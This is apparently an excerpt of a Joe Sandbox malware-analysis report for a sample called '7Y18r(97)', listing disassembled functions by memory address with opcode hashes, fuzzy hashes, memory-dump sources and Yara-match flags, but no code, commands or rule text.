                  • Instruction ID: f3dd5c9c9cbc48cea3f9f371884a70794d821bae7c49e96f9054bd23e72cec75
                  • Opcode Fuzzy Hash: 759f1758229aeb76cec643e6f9352f30e919b820b3177a6432dd61005b589b3f
                  • Instruction Fuzzy Hash: 7311E275500B418BD321CF29C488B93BBE5BB95308F148A2DD4EA87A66D7B4B5058B48
                  Function 02AD9648 Relevance: .0, Instructions: 48COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5606abeddc8b9fa55552bac8524c9807f72ecb992007d1d5d50a8e28d2471efa
                  • Instruction ID: 402a287119ad4f3312bcb37ac9400bb355f9a0c707408512cac08474c5687618
                  • Opcode Fuzzy Hash: 5606abeddc8b9fa55552bac8524c9807f72ecb992007d1d5d50a8e28d2471efa
                  • Instruction Fuzzy Hash: 0D11E271500B45CBD321CF29C588B97FBF5BB95304F148A2DD4EA87A6ACBB4B505CB44
                  Function 025755DF Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 51fa07cd38a241ac07306e195cb44ec725c83bfa4aa709bc616237a8c1a05a05
                  • Instruction ID: 2e91c3da7be009ec4b8d7b4df545342b4ff6f29713f463b1cc9aafb741023ac6
                  • Opcode Fuzzy Hash: 51fa07cd38a241ac07306e195cb44ec725c83bfa4aa709bc616237a8c1a05a05
                  • Instruction Fuzzy Hash: 05F0E23A7592260BA320CD6AFCC0967B7A6F7CA108B095438EE41D3641E632E8028698
                  Function 025A5B23 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7590a598d87cf76c9deee20c9b0b606c77ebb5cb83afff517822a632593feb69
                  • Instruction ID: a304af5129a9d05cda68b31a7f4dc5193af7ba8b1a151c1c0a21234780817a97
                  • Opcode Fuzzy Hash: 7590a598d87cf76c9deee20c9b0b606c77ebb5cb83afff517822a632593feb69
                  • Instruction Fuzzy Hash: AEF031F0A41700BFD7609F18CC02B267EA9B75A750F108254F898DB7D0D771A9158BA6
                  Function 02AB3A80 Relevance: .0, Instructions: 43COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6d9974961c2c1e24016c6f3b4b22a2c3a0e82891c9e089da6793e12fdd39d1c3
                  • Instruction ID: 96950266237771572d4725461319d8309967a1ed4dbc571b22fc93b8d8950950
                  • Opcode Fuzzy Hash: 6d9974961c2c1e24016c6f3b4b22a2c3a0e82891c9e089da6793e12fdd39d1c3
                  • Instruction Fuzzy Hash: 0CF0E9777551165BAB21CD6AD8C0977F3AAEBC6115B19447CE941E3202C932E412C390
                  Function 025AB7AC Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b29e9646fa6f8c61fdc7d93074a39e8d95188f7613722aa20696950e5d08714a
                  • Instruction ID: e480572546c1bc6c9dff7853ff64a94ec5cf74b640a6a2145c32738fba5b132c
                  • Opcode Fuzzy Hash: b29e9646fa6f8c61fdc7d93074a39e8d95188f7613722aa20696950e5d08714a
                  • Instruction Fuzzy Hash: E101123450D3518BD300EF19C15071AFBE2EB96718F15CE0CD0C82B669C375A8568B86
                  Function 02AE9C4D Relevance: .0, Instructions: 42COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 6ed8b7017e0245c01bcfbe6ab0438ee33ec183c9b1d53b9256f66fba3cb69887
                  • Instruction ID: 8c93c87fae4a7b111abc54a28a13bc0ed2feae1793932ed24bb90ee8120ef0b6
                  • Opcode Fuzzy Hash: 6ed8b7017e0245c01bcfbe6ab0438ee33ec183c9b1d53b9256f66fba3cb69887
                  • Instruction Fuzzy Hash: 2801007150D3428FD300EF19C18071AFBE2ABC6704F14DE08D0D82B669C335A8568B86
                  Function 0257101D Relevance: .0, Instructions: 33COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                  • Instruction ID: 058421fd3f14cda5e2c6cd16805c5fe5436ddd66cecd4eafe838ba4cfed49727
                  • Opcode Fuzzy Hash: 2f432f6d4d57ddd5edf10f0a55197208a6667e030cc273150dee4b63bd6a15e3
                  • Instruction Fuzzy Hash: A3011934A50548EFCB14DF98D284AACFBB6FF44310F208299D809AB390C731AF41DB94
                  Function 025A826F Relevance: .0, Instructions: 26COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
                  • Instruction ID: 60db5e9a8a4dc50c69a3c355818deebd68cbb380734259418ab0cc4a263c5db4
                  • Opcode Fuzzy Hash: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
                  • Instruction Fuzzy Hash: 17E0CD7AB15A11459B74CE169815577F3E1FED6711B4CA52ED441D3104D334D4404164
                  Function 02AE6710 Relevance: .0, Instructions: 26COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
                  • Instruction ID: 96868cfa00e69ca80b476b4e37c7d0f850ba0851ff06a5c30863c778894126ed
                  • Opcode Fuzzy Hash: cc8815e1caefdcabb1c8feca523002050e4654cc1546fc6923db71fa5b2fcc4d
                  • Instruction Fuzzy Hash: 9CE0CD7AB55611455B68CF169801677F3E5EAD6711B4CA52DD442D3108D634C4414164
                  Function 02596094 Relevance: .0, Instructions: 23COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: c1ff7fb739851659b64c626cad5adefbefe832c0150e13935bc4811bb5a0a763
                  • Instruction ID: 05d1e183460edd96db2218c6b6055519a2c5a6b8f3195cbcaf5964e50e0e3591
                  • Opcode Fuzzy Hash: c1ff7fb739851659b64c626cad5adefbefe832c0150e13935bc4811bb5a0a763
                  • Instruction Fuzzy Hash: 3CC04C79E492109BC754EF64E49097BF2766BCB210F14B825E85D73310DA31D8199B4E
                  Function 02AD453C Relevance: .0, Instructions: 22COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a2a94bddd44311a9f743247f76408f1939ebca949921368cfe873cf6e7839b25
                  • Instruction ID: d75e36bf9b534050a1e913cac11958984b91e796ae076e2b942829004114718f
                  • Opcode Fuzzy Hash: a2a94bddd44311a9f743247f76408f1939ebca949921368cfe873cf6e7839b25
                  • Instruction Fuzzy Hash: 60C09B34F851104BC244DD2490D0477F2756B8B300F1478549E5AB3345DE35DC15CAC9
                  Function 0257FFAF Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                  • Instruction ID: c212ab06ba7ad7fd2d6b801464466c990deff837d42f481708c9c31eb9139a18
                  • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                  • Instruction Fuzzy Hash: 80D0A7615887B10E5758CD3414A0477FFE4F947612F18149EE4D1E3149D720D801479C
                  Function 02ABE450 Relevance: .0, Instructions: 21COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                  • Instruction ID: 92af941018273d9a8f93ade26dacf6643c46faea71f6fa2dc06a815d180d73ad
                  • Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
                  • Instruction Fuzzy Hash: F6D097206083B00E47198E3840E04F7FBECED4B512F0814CEE0C2E310AC321D8018298
                  Function 0258778D Relevance: .0, Instructions: 18COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0218502a936bc4f879977e5984160d39dfcba9821f739fb6e9003c2ac9a4c6e3
                  • Instruction ID: 59bd7744a9c58ec5a0824438ab497fc2512b8398712bd2e2eb87f888c9ccfe05
                  • Opcode Fuzzy Hash: 0218502a936bc4f879977e5984160d39dfcba9821f739fb6e9003c2ac9a4c6e3
                  • Instruction Fuzzy Hash: B7D0C738C0D551879A276E150584675FB35FA4F159BBC286185C67241157B44056C7BC
                  Function 02AC5C2E Relevance: .0, Instructions: 18COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4fa391072a23d4a199d28cc3f8d3a6cde478c6f87d045af63f15a5255134fc82
                  • Instruction ID: fcc9c9f66a0fa16983a1597317aeef6371583d8354638a76727975e9068b8de2
                  • Opcode Fuzzy Hash: 4fa391072a23d4a199d28cc3f8d3a6cde478c6f87d045af63f15a5255134fc82
                  • Instruction Fuzzy Hash: E1D0A770C1D1468B8A538D0544D02787F31AB071497FC28599BC2310017A64B017C2B8
                  Function 02584ADB Relevance: .0, Instructions: 10COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3ac0bb6aea93e6d9193e5d34b93c17d61cffbcc3410d9d5936b3bb73c52438f1
                  • Instruction ID: ddfa979588bdaba0b86789b4af777ec10fac8b0c017bf1d9d8505254707be5ef
                  • Opcode Fuzzy Hash: 3ac0bb6aea93e6d9193e5d34b93c17d61cffbcc3410d9d5936b3bb73c52438f1
                  • Instruction Fuzzy Hash: DEB01295D8400043D200EF10AC8187FA17A93C7110F047230D008A3510E618D102560E
                  Function 025AD9AB Relevance: .0, Instructions: 9COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3d515b01515d6bd0339b0b7afe8cb27a3a68d7a421aac807d6869e45635cf89b
                  • Instruction ID: 401be1546e6a5ac32ffed33f0587f35b6a1a3ea56bf0535719a5f81ce509930e
                  • Opcode Fuzzy Hash: 3d515b01515d6bd0339b0b7afe8cb27a3a68d7a421aac807d6869e45635cf89b
                  • Instruction Fuzzy Hash: A5B092389086008FD3009F08D450B39F3B4B74B210F116800D459ABA20C334E801CB1C
                  Function 02AEBE4C Relevance: .0, Instructions: 9COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 49c3976feb86782a93754d7b493c9585385504ccd565275ebf85cb2c6a35d227
                  • Instruction ID: 61534556e6efef260235d51d2d88e805bcc23d892630ecbbd5478c9a6d42e67a
                  • Opcode Fuzzy Hash: 49c3976feb86782a93754d7b493c9585385504ccd565275ebf85cb2c6a35d227
                  • Instruction Fuzzy Hash: 24B092349442008FC2508E08D840B71F3B4B70B300F106800E60AAB200C734E8018B28
                  Function 02AC2F7D Relevance: .0, Instructions: 9COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0cdb0d36403f4ef4c8e803c81af979b5fa6c3363669b114ae4e1b01a37139cb9
                  • Instruction ID: eecf16fa27293bea4368cff28850d20dcc763cffaf3aa02090a2b3a1a627c9b8
                  • Opcode Fuzzy Hash: 0cdb0d36403f4ef4c8e803c81af979b5fa6c3363669b114ae4e1b01a37139cb9
                  • Instruction Fuzzy Hash: BBB01250DC400043D141CC6059410B6A17A8347310F047520C608A3605CD19D012C949
                  Function 025AC265 Relevance: .0, Instructions: 7COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 00b33d9247157ad4138830fba57b10d17ec0e4a5b9c751055dbd1dae3c6467e8
                  • Instruction ID: c7b4e9209bb6cf2419fa298ac1f70cd277d5f981c09ab15268e56f3defd217c5
                  • Opcode Fuzzy Hash: 00b33d9247157ad4138830fba57b10d17ec0e4a5b9c751055dbd1dae3c6467e8
                  • Instruction Fuzzy Hash: 92A00238E881008A810CCF109491871E331A657101E113019D455335558A11D405991E
                  Function 025904B4 Relevance: .0, Instructions: 7COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3d1bd163c0184dc2598ccae7f17891fa86307df550a1450621d749b1d31367fb
                  • Instruction ID: 7248366cc74b9433581ba3cfd9bab57cfb0d3390e4b58fbfbd4ef83b64d9adc1
                  • Opcode Fuzzy Hash: 3d1bd163c0184dc2598ccae7f17891fa86307df550a1450621d749b1d31367fb
                  • Instruction Fuzzy Hash: 9FA0022AFC81008B91009F459480470E2B9578F542F1474219944F3612C270D904450C
                  Function 0259A972 Relevance: .0, Instructions: 7COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 86410e7c524f0a59f30d40d74ca3265a2408861a3bf3a595ca50ff9b9b763b90
                  • Instruction ID: 4f6a302e75fd8c0f6f684af2973975aa6cdf55b2ca2d7cf218d44591aad7cb41
                  • Opcode Fuzzy Hash: 86410e7c524f0a59f30d40d74ca3265a2408861a3bf3a595ca50ff9b9b763b90
                  • Instruction Fuzzy Hash: E6A00138A48A158B8618CF00D690871F3B9AB8F601B107459C55A27A528664E8088A6C
                  Function 02AEA706 Relevance: .0, Instructions: 7COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b78290718cfe9833667f9809bb0d987a82645b7f60340e878ae9e2404015a5ce
                  • Instruction ID: 488cc8f9b606208eaef9126068a1e70e16b60b74bd36d602fe8cc3f8d4d92904
                  • Opcode Fuzzy Hash: b78290718cfe9833667f9809bb0d987a82645b7f60340e878ae9e2404015a5ce
                  • Instruction Fuzzy Hash: 4BA00234EC81008A815CCE509050871E335A657601E113409D165335408E15D417991D
                  Function 02ACE955 Relevance: .0, Instructions: 7COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 33a2a0f569f74e3c8ee17a8b22daabff49aa39a5dfb6d0aa38eae9904134215b
                  • Instruction ID: 9d3e2d3bedc0fb1048b2b20aedc14660e87407f7a0ccd8bdf99193e8a817b2d0
                  • Opcode Fuzzy Hash: 33a2a0f569f74e3c8ee17a8b22daabff49aa39a5dfb6d0aa38eae9904134215b
                  • Instruction Fuzzy Hash: D1A00226FC8240CB9A409D869080470F2B9574F241F1478519A04F3602C675D815450C
                  Function 02AD8E13 Relevance: .0, Instructions: 7COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4348a97e3947ecc7a5e42894ff38d284a770d4a1e787d03a7426928ceb590d15
                  • Instruction ID: 16ffcc284b435755ccf3eb7a486b7b9963e608cca10794d862a16b8a815c1c07
                  • Opcode Fuzzy Hash: 4348a97e3947ecc7a5e42894ff38d284a770d4a1e787d03a7426928ceb590d15
                  • Instruction Fuzzy Hash: 74A00234E88B01CBC258CE40D2D0871F3B9AB8F701F50790CC65E37A428B28F819CA6C
                  Function 025AD375 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 769ae33fb318b9331caa574fda37199a56b3353f3a61bc1ad7a7b325d7a6f520
                  • Instruction ID: 96c92687fc764a7bdbf1645ea7779d74ebee8a16ab7288b6b3632956b38543d0
                  • Opcode Fuzzy Hash: 769ae33fb318b9331caa574fda37199a56b3353f3a61bc1ad7a7b325d7a6f520
                  • Instruction Fuzzy Hash: 6E900224D5C2009AC1088F00A450470E23A664B101E503418800D778615B20D805854C
                  Function 025894B5 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1754317851.0000000002570000.00000040.00000020.00020000.00000000.sdmp, Offset: 02570000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2570000_7Y18r(97).jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 8072dc3728a704107f7895a5bf5d84d4d0f88dc3a7d21a01885017d49c0f7bf0
                  • Instruction ID: 73a907a723accf2724e472bbb2ad364e9cf9b9e36812a60d422ef9fc831c06d6
                  • Opcode Fuzzy Hash: 8072dc3728a704107f7895a5bf5d84d4d0f88dc3a7d21a01885017d49c0f7bf0
                  • Instruction Fuzzy Hash: 74900224D481408681088F009450470E23D564F602E14705C8019334528620D504850C
                  Function 02AEB816 Relevance: .0, Instructions: 6COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: ee1af2c7c69adc83d356d23c08ee4e14feec974fd2e26c539d1abc721101d429
                  • Instruction ID: 61b29fc214567e6ad36c98f684916ea8fce350e80a89cc06120e531033cb6bae
                  • Opcode Fuzzy Hash: ee1af2c7c69adc83d356d23c08ee4e14feec974fd2e26c539d1abc721101d429
                  • Instruction Fuzzy Hash: 7A900220D982008AC1888D40A450470E23B664B201E103408810D734515E14D819C54C
                  Function 02ADB8EE Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 226COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: String
                  • String ID: W$g$h$k$l$r$u
                  • API String ID: 2568140703-629726492
                  • Opcode ID: 4e2d440185cbe17423d3d8d44d6b4ebd85f811222732d0dee22af4423441be78
                  • Instruction ID: ea2d12e4b9e8191175d1f5ec076c99feeb654cd42972e9ed2819b500e5571b54
                  • Opcode Fuzzy Hash: 4e2d440185cbe17423d3d8d44d6b4ebd85f811222732d0dee22af4423441be78
                  • Instruction Fuzzy Hash: 1391927260C3818FC735CA2CC4943DEBBE2ABA5324F098E2DD4DA8B395DE759445CB52
                  Function 02ADF5D6 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 180COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1755183116.0000000002AB1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02AB1000, based on PE: false
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2ab1000_7Y18r(97).jbxd
                  Similarity
                  • API ID: Object$DeleteSelect
                  • String ID:
                  • API String ID: 618127014-3916222277
                  • Opcode ID: b1e21b02154f8c66e67e9e1c17c97f39d3722b2dbc43b20e737340c419ee5c38
                  • Instruction ID: 603f99e9d82dfe3651da00ff5c45ba5beee260f6f4220eada4c04e81cc7c932a
                  • Opcode Fuzzy Hash: b1e21b02154f8c66e67e9e1c17c97f39d3722b2dbc43b20e737340c419ee5c38
                  • Instruction Fuzzy Hash: FE81ADB4A04B00DFC390EF69D581A16BBF0FB49304F10892DE99AC7755DB35A819CF92